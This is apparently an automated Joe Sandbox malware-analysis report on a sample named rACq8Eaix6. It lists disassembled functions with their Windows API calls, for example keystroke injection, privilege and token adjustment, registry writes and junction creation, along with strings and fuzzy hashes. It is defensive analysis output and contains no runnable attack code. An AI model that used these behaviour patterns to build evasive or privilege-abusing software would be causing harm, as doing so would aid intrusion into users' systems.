Instruction Fuzzy Hash: 32F01575501B11EFCB389F64E494826FBE1FF143293208ABEE2D682720D7329884DB40

Function 00BF0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BF07B0

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: b5f20218532ed9769e37136bc849b4703a1b73f9c271da1fe0053c2625b98001
Instruction ID: b6df301c4efb573c0047df04391c019eddef654b3dfeb59501da226c59e4e15d
Opcode Fuzzy Hash: b5f20218532ed9769e37136bc849b4703a1b73f9c271da1fe0053c2625b98001
Instruction Fuzzy Hash: 27E0867694422857C720A6699C05FEAB7DDDB887A1F0441B6FD0CD7244E9609C808690

Function 00BF525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00BF5266

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 4ed2d29189a0ace0680ae9e0c39b2a16f4c2f810281669301efaca100ccb88ce
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: D6B0927644020C77CE112A82FC02A593F5D9B41764F408060FB0C19162A673A6689A89

Function 0181B6B0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0181B6C1

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: d347aa04105c5c1405cb7085ea0982e6697b2b24b4c9d324a917ad7163d727cc
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 41E0E67594414DDFDB00EFB4D54969E7FB4EF04301F100561FD01D2285D6309E509A62

Non-executed Functions

Function 00C5CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C5CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C5CB95
GetWindowLongW.USER32(?,000000F0), ref: 00C5CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C5CC00
SendMessageW.USER32 ref: 00C5CC29
_wcsncpy.LIBCMT ref: 00C5CC95
GetKeyState.USER32(00000011), ref: 00C5CCB6
GetKeyState.USER32(00000009), ref: 00C5CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C5CCD9
GetKeyState.USER32(00000010), ref: 00C5CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C5CD0C
SendMessageW.USER32 ref: 00C5CD33
SendMessageW.USER32(?,00001030,?,00C5B348), ref: 00C5CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C5CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C5CE60
SetCapture.USER32(?), ref: 00C5CE69
ClientToScreen.USER32(?,?), ref: 00C5CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C5CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C5CEF5
ReleaseCapture.USER32 ref: 00C5CF00
GetCursorPos.USER32(?), ref: 00C5CF3A
ScreenToClient.USER32(?,?), ref: 00C5CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C5CFA3
SendMessageW.USER32 ref: 00C5CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C5D00E
SendMessageW.USER32 ref: 00C5D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C5D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C5D06D
GetCursorPos.USER32(?), ref: 00C5D08D
ScreenToClient.USER32(?,?), ref: 00C5D09A
GetParent.USER32(?), ref: 00C5D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C5D123
SendMessageW.USER32 ref: 00C5D154
ClientToScreen.USER32(?,?), ref: 00C5D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C5D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C5D20C
SendMessageW.USER32 ref: 00C5D22F
ClientToScreen.USER32(?,?), ref: 00C5D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C5D2B5

Part of subcall function 00BD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BD25EC

GetWindowLongW.USER32(?,000000F0), ref: 00C5D351

Strings

@GUI_DRAGID, xrefs: 00C5CE9C
F, xrefs: 00C5D235

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 909b34a14e85ded669fc309fa9f0b3b87f2ea0231430aac117398812db6066a4
Instruction ID: 82dd59c082afcde02853c7558412e565492c466e25b9b65c29b1350670c1fd59
Opcode Fuzzy Hash: 909b34a14e85ded669fc309fa9f0b3b87f2ea0231430aac117398812db6066a4
Instruction Fuzzy Hash: 2A42CD78204340AFDB25CF24C888BAABBE5FF48312F14051DF965972B1D731D989DB5A

Function 00BE6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BE71C3
_memset.LIBCMT ref: 00BE7539
_memmove.LIBCMT ref: 00BE76AC

Strings

DEFINE, xrefs: 00C22103
[:>:]], xrefs: 00BE7492
Q\E, xrefs: 00BE7FCB
\b(?=\w), xrefs: 00C23769
[:<:]], xrefs: 00BE7479
\b(?<=\w), xrefs: 00C23773

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 624333113455d0560471c83a2be7544853707be0e7c1ab608976a743faac89af
Instruction ID: 8641e636e534022f835f2110fb606331d7cad6898cbb3acd029ed360c945879e
Opcode Fuzzy Hash: 624333113455d0560471c83a2be7544853707be0e7c1ab608976a743faac89af
Instruction Fuzzy Hash: 6D93D475E00265DFDB24CF99D881BADB7F1FF48310F2481AAE915AB681E7749E81CB40

Function 00BD48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00BD48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C0D665
IsIconic.USER32(?), ref: 00C0D66E
ShowWindow.USER32(?,00000009), ref: 00C0D67B
SetForegroundWindow.USER32(?), ref: 00C0D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C0D69B
GetCurrentThreadId.KERNEL32 ref: 00C0D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C0D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C0D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00C0D6CF
SetForegroundWindow.USER32(?), ref: 00C0D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0D6E7
keybd_event.USER32(00000012,00000000), ref: 00C0D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0D6FC
keybd_event.USER32(00000012,00000000), ref: 00C0D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0D70A
keybd_event.USER32(00000012,00000000), ref: 00C0D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0D719
keybd_event.USER32(00000012,00000000), ref: 00C0D71E
SetForegroundWindow.USER32(?), ref: 00C0D721
AttachThreadInput.USER32(?,?,00000000), ref: 00C0D748

Strings

Shell_TrayWnd, xrefs: 00C0D660

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 50f5d76ab493187751737aea51dc937ed7fb9769eb93ae8f73becd5b4cd0986c
Instruction ID: 4cfa0509e0e7635fbc4efa78aab4894c286715ca57884ea8d462b6208280846a
Opcode Fuzzy Hash: 50f5d76ab493187751737aea51dc937ed7fb9769eb93ae8f73becd5b4cd0986c
Instruction Fuzzy Hash: 99319375A40318BBEB202BA18C49F7F7E6CEB44B51F104029FA05FB1D1DAB05981EBA0

Function 00C28310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00C287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C2882B
Part of subcall function 00C287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C28858
Part of subcall function 00C287E1: GetLastError.KERNEL32 ref: 00C28865

_memset.LIBCMT ref: 00C28353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C283A5
CloseHandle.KERNEL32(?), ref: 00C283B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C283CD
GetProcessWindowStation.USER32 ref: 00C283E6
SetProcessWindowStation.USER32(00000000), ref: 00C283F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C2840A

Part of subcall function 00C281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C28309), ref: 00C281E0
Part of subcall function 00C281CB: CloseHandle.KERNEL32(?,?,00C28309), ref: 00C281F2

Strings

, xrefs: 00C28362
winsta0, xrefs: 00C283C8
default, xrefs: 00C28405

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: a2d1d9f040372eefa7cd9a9d5db3449ebac7b28d488b6a9f2ea2da2389e8953c
Instruction ID: c1749e57791c07ff1b481cc489c5734555b7c2ba51576c49c32cdbe7eafbf626
Opcode Fuzzy Hash: a2d1d9f040372eefa7cd9a9d5db3449ebac7b28d488b6a9f2ea2da2389e8953c
Instruction Fuzzy Hash: B3816D75801219AFEF11DFA4EC45AEE7BB8FF04304F144169F920B65A1DB718E59EB20

Function 00C3C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C3C78D
FindClose.KERNEL32(00000000), ref: 00C3C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C3C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C3C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C3C844
__swprintf.LIBCMT ref: 00C3C890
__swprintf.LIBCMT ref: 00C3C8D3

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

__swprintf.LIBCMT ref: 00C3C927

Part of subcall function 00BF3698: __woutput_l.LIBCMT ref: 00BF36F1

__swprintf.LIBCMT ref: 00C3C975

Part of subcall function 00BF3698: __flsbuf.LIBCMT ref: 00BF3713
Part of subcall function 00BF3698: __flsbuf.LIBCMT ref: 00BF372B

__swprintf.LIBCMT ref: 00C3C9C4
__swprintf.LIBCMT ref: 00C3CA13
__swprintf.LIBCMT ref: 00C3CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C3C88A
%4d, xrefs: 00C3C8CD
%02d, xrefs: 00C3C91B, 00C3C925, 00C3C973, 00C3C9C2, 00C3CA11, 00C3CA60

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: eade20376f2b169f87b3cd59f1a41055ed497d6d659380b4887ea0f0b9b02c6f
Instruction ID: 261bfc68238e860af36cc55779ee374e1daf32e30df6e94ecac82fe3bdd80dc2
Opcode Fuzzy Hash: eade20376f2b169f87b3cd59f1a41055ed497d6d659380b4887ea0f0b9b02c6f
Instruction Fuzzy Hash: 35A13BB2408344ABC714EFA4C885DAFB7ECEF94704F40096AF595D7291FA35DA08CB62

Function 00C3EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C3EFB6
_wcscmp.LIBCMT ref: 00C3EFCB
_wcscmp.LIBCMT ref: 00C3EFE2
GetFileAttributesW.KERNEL32(?), ref: 00C3EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00C3F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00C3F026
FindClose.KERNEL32(00000000), ref: 00C3F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00C3F04D
_wcscmp.LIBCMT ref: 00C3F074
_wcscmp.LIBCMT ref: 00C3F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00C3F09D
SetCurrentDirectoryW.KERNEL32(00C88920), ref: 00C3F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C3F0C5
FindClose.KERNEL32(00000000), ref: 00C3F0D2
FindClose.KERNEL32(00000000), ref: 00C3F0E4

Strings

*.*, xrefs: 00C3F048

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: f6997cf0faf5d39ed0d9851f00be517505bc2d3f4ff00a8fc42b5110049b2ea5
Instruction ID: 3d78b46faf0049cfadff155421f9622c8160a51951ce83f9affaf454cbc14e12
Opcode Fuzzy Hash: f6997cf0faf5d39ed0d9851f00be517505bc2d3f4ff00a8fc42b5110049b2ea5
Instruction Fuzzy Hash: B031E9769002086ADB18ABB4DC49BEE77AC9F44361F10057AF914E30A1DB70DB86CB65

Function 00C50857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C50953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C5F910,00000000,?,00000000,?,?), ref: 00C509C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C50A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C50A92
RegCloseKey.ADVAPI32(?), ref: 00C50DB2
RegCloseKey.ADVAPI32(00000000), ref: 00C50DBF

Strings

REG_EXPAND_SZ, xrefs: 00C50A2F
REG_DWORD, xrefs: 00C50C83
REG_BINARY, xrefs: 00C50D4D
REG_QWORD, xrefs: 00C50D00
REG_SZ, xrefs: 00C50AD0
REG_MULTI_SZ, xrefs: 00C50B7A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 49762242370db0aaa9ef968dba2c1ffb4e0b53177473127fe014d120ca7538f9
Instruction ID: fbc13a753cabce3771f034596ca550d759c396cf33543455fd44bc90f9bc8984
Opcode Fuzzy Hash: 49762242370db0aaa9ef968dba2c1ffb4e0b53177473127fe014d120ca7538f9
Instruction Fuzzy Hash: FB027B796006019FCB14EF14C841E2AB7E5FF89714F1488ADF89A9B3A2DB31ED45CB85

Function 00C3F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C3F113
_wcscmp.LIBCMT ref: 00C3F128
_wcscmp.LIBCMT ref: 00C3F13F

Part of subcall function 00C34385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C343A0

FindNextFileW.KERNEL32(00000000,?), ref: 00C3F16E
FindClose.KERNEL32(00000000), ref: 00C3F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00C3F195
_wcscmp.LIBCMT ref: 00C3F1BC
_wcscmp.LIBCMT ref: 00C3F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00C3F1E5
SetCurrentDirectoryW.KERNEL32(00C88920), ref: 00C3F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C3F20D
FindClose.KERNEL32(00000000), ref: 00C3F21A
FindClose.KERNEL32(00000000), ref: 00C3F22C

Strings

*.*, xrefs: 00C3F190

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: fa72214c374b3589228a82ff0cef43c3f61599dcac5e3828851fd4a92506e500
Instruction ID: fde9d5eda27c886e64ceacb1f2f23323bdb5bb990a55f4042746ec636ad23e75
Opcode Fuzzy Hash: fa72214c374b3589228a82ff0cef43c3f61599dcac5e3828851fd4a92506e500
Instruction Fuzzy Hash: 6231C77A90021DBADB14AB64EC59FEF77AC9F45361F1005B9E910E30A0DB31DF8ACA54

Function 00C3A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C3A20F
__swprintf.LIBCMT ref: 00C3A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C3A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C3A293
_memset.LIBCMT ref: 00C3A2B2
_wcsncpy.LIBCMT ref: 00C3A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C3A323
CloseHandle.KERNEL32(00000000), ref: 00C3A32E
RemoveDirectoryW.KERNEL32(?), ref: 00C3A337
CloseHandle.KERNEL32(00000000), ref: 00C3A341

Strings

\, xrefs: 00C3A247
:, xrefs: 00C3A252
\??\%s, xrefs: 00C3A22B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 8997d3181ba4f4a71b927a4b44459fe93f98112f408a6ece664453f64b125baa
Instruction ID: 72b7de2df48cceef6b1b5ae4401abb15939afacecf329e31497f179cad06658e
Opcode Fuzzy Hash: 8997d3181ba4f4a71b927a4b44459fe93f98112f408a6ece664453f64b125baa
Instruction Fuzzy Hash: 7A31A0B5500209ABDB219FA0DC49FEF37BCAF89701F1041BAF608E6161EB7097958B25

Function 00C27CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C28202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C2821E
Part of subcall function 00C28202: GetLastError.KERNEL32(?,00C27CE2,?,?,?), ref: 00C28228
Part of subcall function 00C28202: GetProcessHeap.KERNEL32(00000008,?,?,00C27CE2,?,?,?), ref: 00C28237
Part of subcall function 00C28202: HeapAlloc.KERNEL32(00000000,?,00C27CE2,?,?,?), ref: 00C2823E
Part of subcall function 00C28202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C28255

Part of subcall function 00C2829F: GetProcessHeap.KERNEL32(00000008,00C27CF8,00000000,00000000,?,00C27CF8,?), ref: 00C282AB
Part of subcall function 00C2829F: HeapAlloc.KERNEL32(00000000,?,00C27CF8,?), ref: 00C282B2
Part of subcall function 00C2829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C27CF8,?), ref: 00C282C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C27D13
_memset.LIBCMT ref: 00C27D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C27D47
GetLengthSid.ADVAPI32(?), ref: 00C27D58
GetAce.ADVAPI32(?,00000000,?), ref: 00C27D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C27DB1
GetLengthSid.ADVAPI32(?), ref: 00C27DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C27DDD
HeapAlloc.KERNEL32(00000000), ref: 00C27DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C27E05
CopySid.ADVAPI32(00000000), ref: 00C27E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C27E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C27E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C27E77

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

